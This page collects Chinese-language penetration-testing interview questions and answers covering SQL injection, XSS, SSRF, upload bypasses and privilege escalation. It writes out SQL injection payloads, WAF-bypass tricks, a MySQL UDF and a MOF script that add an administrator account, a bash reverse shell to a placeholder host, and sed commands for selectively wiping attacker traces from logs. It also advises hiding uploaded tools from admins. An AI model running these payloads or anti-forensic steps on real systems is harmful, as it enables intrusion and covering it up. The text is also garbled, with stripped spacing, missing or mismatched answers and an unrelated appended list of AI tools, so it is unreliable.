渗透测试面试问题——软件测试圈软件测试文章

日志、测试数据的清理总结,输出渗透测试报告,附修复方案

复测

验证并发现是否有新漏洞,输出报告,归档

1.拿到一个待检测的站,你觉得应该先做什么?

a、信息收集

2、查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。

3、查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞

4、查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如rsync,心脏出血,mysql,ftp,ssh弱口令等。

5、扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针

6、googlehack进一步探测网站的信息,后台,敏感文件

b、漏洞扫描开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等

c、漏洞利用利用以上的方式拿到webshell,或者其他权限

d、权限提升提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉,linux脏牛漏洞,linux内核版本漏洞提权,linux下的mysqlsystem提权以及oracle低权限提权

e、日志清理

f、总结报告及修复方案

2.判断出网站的CMS对渗透有什么意义?

查找网上已曝光的程序漏洞。

如果开源,还能下载相对应的源码进行代码审计。

3.一个成熟并且相对安全的CMS,渗透时扫目录的意义?

敏感文件、二级目录扫描

站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

4.常见的网站服务器容器。

5.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?

root权限以及网站的绝对路径。

6.目前已知哪些版本的容器有解析漏洞,具体举例。

a、IIS6.0/xx.asp/xx.jpg"xx.asp"是文件夹名

b、IIS7.0/7.5默认Fast-CGI开启,直接在url中图片地址后面输入/1.php,会把正常图片当成php解析

c、Nginx版本小于等于0.8.37,利用方法和IIS7.0/7.5一样,Fast-CGI关闭情况下也可利用。空字节代码xxx.jpg.php

d、Apache上传的文件命名为:test.php.x1.x2.x3,Apache是从右往左判断后缀

7.如何手工快速判断目标站是windows还是linux服务器?

linux大小写敏感,windows大小写不敏感。

8.为何一个mysql数据库的站,只有一个80端口开放?

更改了端口,没有扫描出来。

站库分离。

3306端口不对外开放

9、3389无法连接的几种情况

没开放3389端口端口被修改防护拦截处于内网(需进行端口转发)

10.如何突破注入时字符被转义?

宽字符注入hex编码绕过

11.在某后台新闻编辑界面看到编辑器,应该先做什么?

查看编辑器的名称版本,然后搜索公开的漏洞。

12.拿到一个webshell发现网站根目录下有.htaccess文件,我们能做什么?

具体其他的事情,不好详说,建议大家自己去搜索语句来玩玩。

13.注入漏洞只能查账号密码?

只要权限广,拖库脱到老。

14.安全狗会追踪变量,从而发现出是一句话木马吗?

是根据特征码,所以很好绕过了,只要思路宽,绕狗绕到欢,但这应该不会是一成不变的。

15.access扫出后缀为asp的数据库文件,访问乱码,如何实现到本地利用?

迅雷下载,直接改后缀为.mdb。

16.提权时选择可读写目录,为何尽量不用带空格的目录?

因为exp执行多半需要空格界定参数

17.某服务器有站点A,B为何在A的后台添加test用户,访问B的后台。发现也添加上了test用户?

同数据库。

18.注入时可以不使用and或or或xor,直接orderby开始注入吗?

and/or/xor,前面的1=1、1=2步骤只是为了判断是否为注入点,如果已经确定是注入点那就可以省那步骤去。

19:某个防注入系统,在注入时会提示:

20、如何利用这个防注入系统拿shell?

在URL里面直接提交一句话,这样网站就把你的一句话也记录进数据库文件了这个时候可以尝试寻找网站的配置文件直接上菜刀链接。

21.上传大马后访问乱码时,有哪些解决办法?

浏览器中改编码。

22.审查上传点的元素有什么意义?

有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。

23.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?

先爆破用户名,再利用被爆破出来的用户名爆破密码。其实有些站点,在登陆处也会这样提示所有和数据库有交互的地方都有可能有注入。

这就是传说中的下载漏洞!在file=后面尝试输入index.php下载他的首页文件,然后在首页文件里继续查找其他网站的配置文件,可以找出网站的数据库密码和数据库的地址。

25.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和admin目录。请问你的想法是?

直接在网站二级目录/abc/下扫描敏感文件及目录。

26.在有shell的情况下,如何使用xss实现对目标站的长久控制?

27.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?

审查元素把密码处的password属性改成text就明文显示了

28.目标站无防护,上传图片可以正常访问,上传脚本格式访问则403.什么原因?

原因很多,有可能web服务器配置把上传目录写死了不执行相应脚本,尝试改后缀名绕过

29.审查元素得知网站所使用的防护软件,你觉得怎样做到的?

在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12看HTML体部比如护卫神就可以在名称那看到内容。

30.在win2003服务器中建立一个.zhongzi文件夹用意何为?

隐藏文件夹,为了不让管理员发现你传上去的工具。

31、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由:

A.demo.jspid=2+1B.demo.jspid=2-1选B,在URL编码中+代表空格,可能会造成混淆

32、以下链接存在sql注入漏洞,对于这个变形注入,你有什么思路?

demo.doDATA=AjAxNg==DATA有可能经过了base64编码再传入服务器,所以我们也要对参数进行base64编码才能正确完成测试

33、发现demo.jspuid=110注入点,你有哪几种思路获取webshell,哪种是优选?

34、CSRF和XSS和XXE有什么区别,以及修复方式?

XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。修复方式:对字符实体进行转义、使用HTTPOnly来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。

35、CSRF、SSRF和重放攻击有什么区别?

CSRF是跨站请求伪造攻击,由客户端发起SSRF是服务器端请求伪造,由服务器发起重放攻击是将截获的数据包进行重放,达到身份认证等目的

36、说出至少三种业务逻辑漏洞,以及修复方式?

密码找回漏洞中存在

1)密码允许暴力破解、

2)存在通用型找回凭证、

3)可以跳过验证步骤、

4)找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码。

身份认证漏洞中最常见的是

1)会话固定攻击

2)Cookie仿冒

只要得到Session或Cookie即可伪造用户身份。

验证码漏洞中存在

1)验证码允许暴力破解

2)验证码可以通过Javascript或者改包的方法来进行绕过

37、圈出下面会话中可能存在问题的项,并标注可能会存在的问题?

38、给你一个网站你是如何来渗透测试的

39、sqlmap,怎么对一个注入点注入?

1)如果是get型号,直接,sqlmap-u"诸如点网址".

2)如果是post型诸如点,可以sqlmap-u"注入点网址”--data="post的参数"

3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用号替换,放到文件里,然后sqlmap-r"文件地址"

40、nmap,扫描的几种方式

1)全连接扫描(TCPconnectscan)

2)半开放SYN扫描(TCPSYNscan)

3)ACK扫描

4)FIN扫描

5)TCPXmas扫描(圣诞树)

6)TCPNULL扫描

7)UDP扫描

41、sql注入的几种类型?

1)报错注入

2)bool型注入

3)延时注入

4)宽字节注入

42、报错注入的函数有哪些?

10个

1)andextractvalue(1,concat(0x7e,(select@@version),0x7e))2)通过floor报错向下取整3)+andupdatexml(1,concat(0x7e,(secect@@version),0x7e),1)4).geometrycollection()selectfromtestwhereid=1andgeometrycollection((selectfrom(selectfrom(selectuser())a)b));5).multipoint()selectfromtestwhereid=1andmultipoint((selectfrom(selectfrom(selectuser())a)b));6).polygon()selectfromtestwhereid=1andpolygon((selectfrom(selectfrom(selectuser())a)b));7).multipolygon()selectfromtestwhereid=1andmultipolygon((selectfrom(selectfrom(selectuser())a)b));8).linestring()selectfromtestwhereid=1andlinestring((selectfrom(selectfrom(selectuser())a)b));9).multilinestring()selectfromtestwhereid=1andmultilinestring((selectfrom(selectfrom(selectuser())a)b));10).exp()selectfromtestwhereid=1andexp(~(select*from(selectuser())a));43、延时注入如何来判断?

if(ascii(substr(“hello”,1,1))=104,sleep(5),1)

44、盲注和延时注入的共同点?

都是一个字符一个字符的判断

45、如何拿一个网站的webshell?

上传,后台编辑模板,sql注入写文件,命令执行,代码执行,一些已经爆出的cms漏洞,比如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等

46、sql注入写文件都有哪些函数?

1)验证referer

2)验证token

48、owasp漏洞都有哪些?

1、SQL注入防护方法:

2、失效的身份认证和会话管理

3、跨站脚本攻击XSS

4、直接引用不安全的对象

5、安全配置错误

6、敏感信息泄露

7、缺少功能级的访问控制

8、跨站请求伪造CSRF

9、使用含有已知漏洞的组件

10、未验证的重定向和转发

49、SQL注入防护方法?

1、使用安全的API

2、对输入的特殊字符进行Escape转义处理

3、使用白名单来规范化输入验证方法

5、服务器端在提交数据库进行SQL查询之前,对特殊字符进行过滤、转义、替换、删除。

50、代码执行,文件读取,命令执行的函数都有哪些?

1)代码执行:

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function2)文件读取:

file_get_contents(),highlight_file(),fopen(),readfile(),fread(),fgetss(),fgets(),parse_ini_file(),show_source(),file()等3)命令执行:

system(),exec(),shell_exec(),passthru(),pcntl_exec(),popen(),proc_open()51、img标签除了onerror属性外,还有其他获取管理员路径的办法吗?

src指定一个远程的脚本文件,获取referer

52、img标签除了onerror属性外,并且src属性的后缀名,必须以.jpg结尾,怎么获取管理员路径。

53、为什么aspx木马权限比asp大?

aspx使用的是.net技术。IIS中默认不支持,ASP只是脚本语言而已。入侵的时候asp的木马一般是guest权限…APSX的木马一般是users权限。

54、如何绕过waf?

大小写转换法干扰字符/*!*/编码base64unicodehexurlascll复参数

55、如何向服务器写入webshell?

56、渗透测试中常见的端口

a、web类(web漏洞/敏感目录)第三方通用组件漏洞strutsthinkphpjbossgangliazabbix

80web80-89web8000-9090web

b、数据库类(扫描弱口令)

1433MSSQL1521Oracle3306MySQL5432PostgreSQL

d、常用端口类(扫描弱口令/端口爆破)

21ftp22SSH23Telnet2601,2604zebra路由,默认密码zebra3389远程桌面

ALL、端口合计详情

6、规范编码,字符集

原理:

使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行,是在数据库完成sql指令的编译后才套用参数运行

简单的说:参数化能防注入的原因在于,语句是语句,参数是参数,参数的值并不是语句的一部分,数据库只按语句的语义跑

UAREFERERCOOKIEIP

产生原理

在数据库使用了宽字符集而WEB中没考虑这个问题的情况下,在WEB层,由于0XBF27是两个字符,在PHP中比如addslash和magic_quotes_gpc开启时,由于会对0x27单引号进行转义,因此0xbf27会变成0xbf5c27,而数据进入数据库中时,由于0XBF5C是一个另外的字符,因此\转义符号会被前面的bf带着"吃掉",单引号由此逃逸出来可以用来闭合语句。

在哪里编码根本原因

character_set_client(客户端的字符集)和character_set_connection(连接层的字符集)不同,或转换函数如,iconv、mb_convert_encoding使用不当。

解决办法

统一数据库、Web应用、操作系统所使用的字符集,避免解析产生差异,最好都设置为UTF-8。或对数据进行正确的转义,如mysql_real_escape_string+mysql_set_charset的使用。

先理解这句SQL

如果此SQL被修改成以下形式,就实现了注入

之后SQL语句变为

userlevel为用户级别

写shell:root权限,GPC关闭,知道文件路径outfile函数

代替空格的方法

%0a、%0b、%a0等/**/等注释符<>

mysql的网站注入,5.0以上和5.0以下有什么区别?

5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。

5.0以下是多用户单操作,5.0以上是多用户多操做。

XSS原理

反射型

用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。需要诱使用户“点击”一个恶意链接,才能攻击成功

储存型

存储型XSS会把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。

DOM型

通过修改页面的DOM节点形成的XSS,称之为DOMBasedXSS。

DOM型和反射型的区别

反射型XSS:通过诱导用户点击,我们构造好的恶意payload才会触发的XSS。反射型XSS的检测我们在每次请求带payload的链接时页面应该是会带有特定的畸形数据的。DOM型:通过修改页面的DOM节点形成的XSS。DOM-basedXSS由于是通过js代码进行dom操作产生的XSS,所以在请求的响应中我们甚至不一定会得到相应的畸形数据。根本区别在我看来是输出点的不同。

在回答这段问题的时候,由于平时对客户的检测中,基本是凭借不同功能点的功能加上经验和直觉来进行检测,对不同类型的XSS检测方式实际上并没有太过细分的标准化检测方式,所以回答的很烂。。。

输入点检查:对用户输入的数据进行合法性检查,使用filter过滤敏感字符或对进行编码转义,针对特定类型数据进行格式检查。针对输入点的检查最好放在服务器端实现。

除此之外,还有做HTTPOnly对Cookie劫持做限制。

XSS蠕虫的产生条件

正常情况下,一个是产生XSS点的页面不属于self页面,用户之间产生交互行为的页面,都可能造成XSSWorm的产生。不一定需要存储型XSS

CSRF原理

CSRF是跨站请求伪造攻击,由客户端发起,是由于没有在关键操作执行时进行是否由用户自愿发起的确认

防御

验证Referer添加token

token安全等级更高,因为并不是任何服务器都可以取得referer,如果从HTTPS跳到HTTP,也不会发送referer。并且FLASH一些版本中可以自定义referer。但是token的话,要保证其足够随机且不可泄露。(不可预测性原则)

对header中的referer的验证,一个是空referer,一个是referer过滤或者检测不完善。为了杜绝这种问题,在验证的白名单中,正则规则应当写完善。

引用一段请教前辈的回答:

SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。

SSRF漏洞的验证方法:

1)因为SSRF漏洞是让服务器发送请求的安全漏洞,所以我们就可以通过抓包分析发送的请求是否是由服务器的发送的,从而来判断是否存在SSRF漏洞

2)在页面源码中查找访问的资源地址,如果该资源地址类型为www.baidu.com/xxx.phpimage=(地址)的就可能存在SSRF漏洞4[1]

成因:模拟服务器对其他服务器资源进行请求,没有做合法性验证。利用:构造恶意内网IP做探测,或者使用其余所支持的协议对其余服务进行攻击。防御:禁止跳转,限制协议,内外网限制,URL限制。绕过:使用不同协议,针对IP,IP格式的绕过,针对URL,恶意URL增添其他字符,@之类的。301跳转+dnsrebindding。

文件上传漏洞原理

由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件

常见的上传绕过方式

前端js验证:禁用js/burp改包大小写双重后缀名过滤绕过pphphp->php

防护

文件上传目录设置为不可执行使用白名单判断文件上传类型用随机数改写文件名和路径

审查上传点的元素有什么意义?

原理

引入一段用户能控制的脚本或代码,并让服务器端执行include()等函数通过动态变量的方式引入需要包含的文件;用户能够控制该动态变量。

导致文件包含的函数

PHP:include(),include_once(),require(),re-quire_once(),fopen(),readfile(),…JSP/Servlet:ava.io.File(),java.io.Fil-eReader(),…ASP:includefile,includevirtual,本地文件包含

能够打开并包含本地文件的漏洞,被称为本地文件包含漏洞

金融行业常见逻辑漏洞

单针对金融业务的主要是数据的篡改(涉及金融数据,或部分业务的判断数据),由竞争条件或者设计不当引起的薅羊毛,交易/订单信息泄露,水平越权对别人的账户查看或恶意操作,交易或业务步骤绕过。

中间人攻击是一个(缺乏)相互认证的攻击;由于客户端与服务器之间在SSL握手的过程中缺乏相互认证而造成的漏洞

防御中间人攻击的方案通常基于一下几种技术

1.公钥基础建设PKI使用PKI相互认证机制,客户端验证服务器,服务器验证客户端;上述两个例子中都是只验证服务器,这样就造成了SSL握手环节的漏洞,而如果使用相互认证的的话,基本可以更强力的相互认证

2.延迟测试

使用复杂加密哈希函数进行计算以造成数十秒的延迟;如果双方通常情况下都要花费20秒来计算,并且整个通讯花费了60秒计算才到达对方,这就能表明存在第三方中间人。

3.使用其他形式的密钥交换形式

每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。在ARP缓存表机制存在一个缺陷,就是当请求主机收到ARP应答包后,不会去验证自己是否向对方主机发送过ARP请求包,就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中,如果原有相同IP对应关系,原有的则会被替换。这样攻击者就有了偷听主机传输的数据的可能

1.在主机绑定网关MAC与IP地址为静态(默认为动态),命令:arp-s网关IP网关MAC

2.在网关绑定主机MAC与IP地址

3.使用ARP防火墙

Ddos原理

利用合理的请求造成资源过载,导致服务不可用

syn洪流的原理

伪造大量的源IP地址,分别向服务器端发送大量的SYN包,此时服务器端会返回SYN/ACK包,因为源地址是伪造的,所以伪造的IP并不会应答,服务器端没有收到伪造IP的回应,会重试3~5次并且等待一个SYNTime(一般为30秒至2分钟),如果超时则丢弃这个连接。攻击者大量发送这种伪造源地址的SYN请求,服务器端将会消耗非常多的资源(CPU和内存)来处理这种半连接,同时还要不断地对这些IP进行SYN+ACK重试。最后的结果是服务器无暇理睬正常的连接请求,导致拒绝服务。

CC攻击原理

对一些消耗资源较大的应用页面不断发起正常的请求,以达到消耗服务端资源的目的。

提权

mysql两种提权方式

udf提权,mof提权

Mysql_UDF提权

要求:1.目标系统是Windows(Win2000,XP,Win2003);2.拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数3.有root账号密码导出udf:MYSQL5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数可以再mysql里输入select@@basedirshowvariableslike‘%plugins%’寻找mysql安装路径提权:

使用SQL语句创建功能函数。语法:CreateFunction函数名(函数名只能为下面列表中的其中之一)returnsstringsoname‘导出的DLL路径’;

createfunctioncmdshellreturnsstringsoname‘udf.dll’selectcmdshell(‘netuserarscharsch/add’);selectcmdshell(‘netlocalgroupadministratorsarsch/add’);dropfunctioncmdshell;该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录即可。

Mysqlmof提权

#pragmanamespace("\\\\.\\root\\subscription")instanceof__EventFilteras$EventFilter{EventNamespace="Root\\Cimv2";Name="filtP2";Query="Select*From__InstanceModificationEvent""WhereTargetInstanceIsa\"Win32_LocalTime\"""AndTargetInstance.Second=5";QueryLanguage="WQL";};instanceofActiveScriptEventConsumeras$Consumer{Name="consPCSV2";ScriptingEngine="JScript";ScriptText="varWSH=newActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exeuserwaitalonewaitalone.cn/add\")";};instanceof__FilterToConsumerBinding{Consumer=$Consumer;Filter=$EventFilter;};其中的第18行的命令,上传前请自己更改。

2、执行load_file及intodumpfile把文件导出到正确的位置即可。

产生原因

利用条件和方法

条件:

a、redis服务以root账户运行b、redis无密码或弱密码进行认证c、redis监听在0.0.0.0公网上

方法:

修复

密码验证降权运行限制ip/修改端口

println"ifconfig-a".execute().text执行一些系统命令,利用wget下载webshell

Memcached是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者通过命令交互可直接读取Memcached中的敏感信息。

利用

2、telnet11211,或nc-vv11211,提示连接成功表示漏洞存在

漏洞加固

a、设置memchached只允许本地访问b、禁止外网访问Memcached11211端口c、编译时加上–enable-sasl,启用SASL认证

通过调用加密API将payload加密放入一个会被执行的段字节中。但是具体回答工程中我只回答道了SSRF老洞,m3u8头,偏移量,加密。

WEB

常用WEB开发JAVA框架

STRUTS,SPRING常见的java框架漏洞其实面试官问这个问题的时候我不太清楚他要问什么,我提到struts的045048,java常见反序列化。045错误处理引入了ognl表达式048封装action的过程中有一步调用getstackvalue递归获取ognl表达式反序列化操作对象,通过手段引入。apachecommon的反射机制、readobject的重写,其实具体的我也记不清楚。。。然后这部分就结束了

同源策略

同源策略限制不同源对当前document的属性内容进行读取或设置。不同源的区分:协议、域名、子域名、IP、端口,以上有不同时即不同源。

Jsonp安全攻防技术,怎么写Jsonp的攻击页面?

涉及到Jsonp的安全攻防内容

JSON劫持、Callback可定义、JSONP内容可定义、Content-type不为json。

攻击页面

JSON劫持,跨域劫持敏感信息,页面类似于

php中命令执行涉及到的函数

1,代码执行:eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function()2,文件读取:file_get_contents(),highlight_file(),fopen(),readfile(),fread(),fgetss(),fgets(),parse_ini_file(),show_source(),file()等3,命令执行:system(),exec(),shell_exec(),passthru(),pcntl_exec(),popen(),proc_open()安全模式下绕过php的disablefuctionDL函数,组件漏洞,环境变量。

PHP弱类型

==在进行比较的时候,会先将字符串类型转化成相同,再比较

如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行

0e开头的字符串等于0

各种数据库文件存放的位置

mysql:/usr/local/mysql/data/C:\ProgramData\MySQL\MySQLServer5.6\Data\oracle:$ORACLE_BASE/oradata/$ORACLE_SID/系统如何清理日志

meterpreter:clearev

入侵Linux服务器后需要清除哪些日志?

web日志,如apache的access.log,error.log。直接将日志清除过于明显,一般使用sed进行定向清除

e.g.sed-i-e‘/192.169.1.1/d’

history命令的清除,也是对~/.bash_history进行定向清除

wtmp日志的清除,/var/log/wtmp

查看当前端口连接的命令有哪些?netstat和ss命令的区别和优缺点

netstat-antp``ss-l

ss的优势在于它能够显示更多更详细的有关TCP和连接状态的信息,而且比netstat更快速更高效。

反弹shell的常用命令?一般常反弹哪一种shell?为什么

bash-i>&/dev/tcp/x.x.x.x/44440>&1

通过Linux系统的/proc目录,能够获取到哪些信息,这些信息可以在安全上有哪些应用?

ls/proc

系统信息,硬件信息,内核版本,加载的模块,进程

linux系统中,检测哪些配置文件的配置项,能够提升SSH的安全性。

/etc/ssh/sshd___configiptables配置

如何一条命令查看文件内容最后一百行

tail-n100filename

Windows

如何加固一个域环境下的Windows桌面工作环境?请给出你的思路。

AES/DES的具体工作步骤RSA算法

加密:

密文=明文^EmodN

RSA加密是对明文的E次方后除以N后求余数的过程

公钥=(E,N)

解密:

明文=密文^DmodN私钥=(D,N)

三个参数n,e1,e2

n是两个大质数p,q的积

分组密码的加密模式如何生成一个安全的随机数?

SSL握手过程

建立TCP连接、客户端发送SSL请求、服务端处理SSL请求、客户端发送公共密钥加密过的随机数据、服务端用私有密钥解密加密后的随机数据并协商暗号、服务端跟客户端利用暗号生成加密算法跟密钥key、之后正常通信。这部分本来是忘了的,但是之前看SSLPinning的时候好像记了张图在脑子里,挣扎半天还是没敢确定,遂放弃。。。

对称加密与非对称加密的不同,分别用在哪些方面

TCP三次握手的过程以及对应的状态转换

(1)客户端向服务器端发送一个SYN包,包含客户端使用的端口号和初始序列号x;(2)服务器端收到客户端发送来的SYN包后,向客户端发送一个SYN和ACK都置位的TCP报文,包含确认号xx1和服务器端的初始序列号y;(3)客户端收到服务器端返回的SYNSACK报文后,向服务器端返回一个确认号为yy1、序号为xx1的ACK报文,一个标准的TCP连接完成。

TCP和UDP协议区别

tcp面向连接,udp面向报文tcp对系统资源的要求多udp结构简单tcp保证数据完整性和顺序,udp不保证

a、客户端发送请求到服务器端b、服务器端返回证书和公开密钥,公开密钥作为证书的一部分而存在c、客户端验证证书和公开密钥的有效性,如果有效,则生成共享密钥并使用公开密钥加密发送到服务器端d、服务器端使用私有密钥解密数据,并使用收到的共享密钥加密数据,发送到客户端e、客户端使用共享密钥解密数据f、SSL加密建立

wireshark简单的过滤规则

过滤ip:

过滤源ip地址:ip.src==1.1.1.1;,目的ip地址:ip.dst==1.1.1.1;

过滤端口:

过滤80端口:tcp.port==80,源端口:tcp.srcport==80,目的端口:tcp.dstport==80

THE END
1.言之画10秒内即可生成大量的合格优质素材,可解决短期内创作瓶颈的问题。 支持二次创作 素材二次创作不受专业限制,小白也能上手,完成高质量作品。 图片编辑处理 全套图片抠图、精修、涂抹处理工具,无PS痕迹。 人人皆可绘制专业的图片作品 文本生成图片 一句话文本描述生成图片,减少设计师手动创作素材的时间和精力,10秒内即可https://paint.weta365.com/
2.最容易上手的10款ai生成图片工具推荐随着人工智能的快速发展,AI工具在很多产业也发挥着越来越重要的作用,无论何时何地,强大的AI工具都能有效帮助团队或者个人高效完成工作。本文为大家介绍10款为设计师量身打造的AI生成图片工具,一起来看看吧!即时灵感是国产的 AI 以图画图网站,能够在线免费使用,不仅支https://aiqicha.baidu.com/qifuknowledge/detail?id=10140872375
3.5个国内优秀的AI绘画工具,一句话就能生成精美图片,太厉害了免费用户生成图片需要排队,快的话大概几十秒,慢的话大概几分钟,就能生成图片了,生成的图片可以下载,也可以公开展示。 3、Draft 一个模型丰富的AI绘画网站,它里面不仅有官方模型、二次元女生、二次元男生、未来科技、奇幻之旅、游戏等类型的模型,还有社区模型可以使用,不过它不是完全免费的,每天会有一些免费额度可以https://blog.csdn.net/m0_74942241/article/details/135922429
4.精选12个完全免费的软件工具!eSearch 是一个完全免费的多功能合集软件;软件支持 Windows 、macOS 。 它完全免费,功能非常强大,支持的功能包括:离线 OCR 、电脑截图、电脑长截图、电脑录屏、将截图钉在电脑屏幕上、二维码识别、以图搜图、强大的图片编辑功能、取色器、放大镜、画笔和几何形状、划句搜索、翻译等功能。 https://zhuanlan.zhihu.com/p/676006329
5.AI工具大全AI生成游戏素材 描述:AI生成游戏素材,可以通过绘制边界+描述生成各种游戏素材 地址:http://iliad.ai Booth 产品营销图生成 描述:产品放在不同布景生成营销用图 地址:http://booth.ai 办公工具 Gamma 一句话生成PPT 描述:一句话生成PPT,释放你的双手 地址:https://gamma.app/ https://www.1987web.com/?id=26575
6.有没有每日一图或者每日一句话的网站或者软件吾爱破解然后这个AI生成的文案也得多抽卡:"醉于往事,共话人生百态""在微醺的星光下,我有陈年的佳酿,你有https://www.52pojie.cn/thread-1945611-1-1.html
7.国内外好用的5款AI绘画软件推荐A1.art 真的很厉害,它能把你说的一句话或者一张图,轻轻松松就变成一幅逼真的画作,不管是人像还是风景,都栩栩如生,简直就是大师级别的作品! 点击图片即可轻松生成逼真的人物写真风格的 AI 绘画 而且,这个软件还特别贴心,不用下载,直接在线就能用,超级方便! https://js.design/special/article/ai-painting-software.html
8.可以自动生成PPT的AI软件有哪些?一句话生成pptboardmix AI 是一款集成在智能办公软件 boardmix 博思白板中的 AI 助手,它具备多种功能,包括但不限于 AI 生成 PPT、流程图、思维导图、代码、绘画和写作等。boardmix AI 的这些功能使得它成为一个强大的工具,无论是个人笔记、在线研讨会、头脑风暴、设计探索还是敏捷开发流程,都能提供有效的支持。自动生成PPT的https://boardmix.cn/article/ai-software-for-automatically-generating-ppt/
9.Gamma:强大的AI制作PPT神器,用完再也回不去了!看过许多 AI 制作 PPT 软件,最终还是被 Gamma 惊艳到。 Gamma 是一款基于人工智能技术的 PPT 制作工具,可以帮助用户轻松制作高质量的 PPT 演示文稿。 痛点解决 相比传统制作 PPT 方式,Gamma 可以解决哪些如下 7 个痛点: 一句话生成 PPT 传统制作 PPT,首先我们得定义一个主题,不管该主题是自愿的还是被迫的,接受https://blog.51cto.com/u_15274598/6567064
10.超强的图片生成视频的AI视频剪辑软件…超强的图片生成视频的AI视频剪辑软件,亲人拥抱,变魔鬼,无里头打架,雷击 filmora国际版 国内网络可用 AI (本内容由AI生成)#AI探索计划# #AI创造营# 0条评论|0人参与网友评论 登录|注册发布 相关新闻 谷歌发布新一代视频生成模型Veo 2 挑战OpenAI Sora 12月18日 19:06| 新浪科技ai技术谷歌27 科技圈昨夜今晨https://t.cj.sina.com.cn/articles/view/6042105354/m16823360a03301s0hc
11.文字生成图片的有哪些APP推荐文字生成图片的有哪些下载豌豆荚文字生成图片的有哪些榜单为您提供最新文字生成图片的有哪些大全,这里不仅有文字生成图片的有哪些安卓版本APP、历史版本应用下载资源,还有类似文字生成图片的有哪些的应用推荐,欢迎大家前来豌豆荚下载。https://www.wandoujia.com/bangdan/406451/
12.MindSea—免费好用的思维导图模板AI生成制作软件怎么画AI助力,一句话生成思维导图 释放你的创造力,澄清你的思绪。我们的产品利用人工智能的力量,将你的简单想法转化为全面的思维导图。 常见格式,瞬间转换为思维导图 将word、pdf、长文本、图片转换为清晰、有结构的思维导图。用我们的创新功能,告别混乱,生成清晰、简化,可视化,智能的导图。 https://www.mindsea.net/
13.思维导图软件哪个好?这5个AI生成工具值得推荐!想必大家对思维导图并不陌生,这些年随着各式各样的思维导图软件涌现出来,它们在降低思维导图制作门槛的同时,也进一步普及了思维导图。 站在2024年的末尾,我们会发现,除了传统的思维导图软件,由AI驱动的思维导图生成软件也逐渐成为主流,得益于背后的大语言模型,只需输入一句话,思维导图生成软件就会快速返回一幅完整https://www.jianshu.com/p/a0ea945774a5
14.TreeMind树图思维导图TreeMind树图思维导图软件TreeMind树图电脑版是一款免费的思维导图制作软件,获得过多项荣誉,与各大企业均有合作,能够为用户提供优质的思维导图制作服务。拥有强大的AI助手,可以一句话生成思维导图、将图片转换为思维导图,还能对文档进行总结并转换为思维导图,大幅减少用户的实际工作量,使思维导图制作更加轻松。 TreeMind树图优势亮点 分屏导https://www.sxiaw.com/down/23488.html
15.Gen就在深夜,Runway家标志性的AI视频生成工具Gen-2,迎来了“iPhone时刻”般的史诗级更新—— 依旧是简单一句话输入,不过这一次,视频效果一口气拉到了4K超逼真的高度! 话不多说,我们直接来看炸裂的效果: 不难看出,这一次AI生成视频的效果已经克服了以往“一眼AI”的缺点,即不连贯、闪烁变形以及低清等等。 而这也正https://wallstreetcn.com/articles/3701179
16.亿图图示:一站式专业绘图软件,涵盖210种绘图类型,流程图,架构图4. AI一键绘画:亿图图示AI可以根据用户的需求,一句话生成插图,为用户提供丰富的图形表达能力。 产品特点: 1. 快速高效:亿图图示AI通过人工智能技术,能够在短时间内生成各种图形图表,帮助用户快速完成工作任务。 2. 智能分析:亿图图示AI可以对文本和图形图表进行智能分析,提供准确的数据支持,帮助用户做出更好的决策。http://hr.zlzl666.com/article/index.php?c=show&id=3347
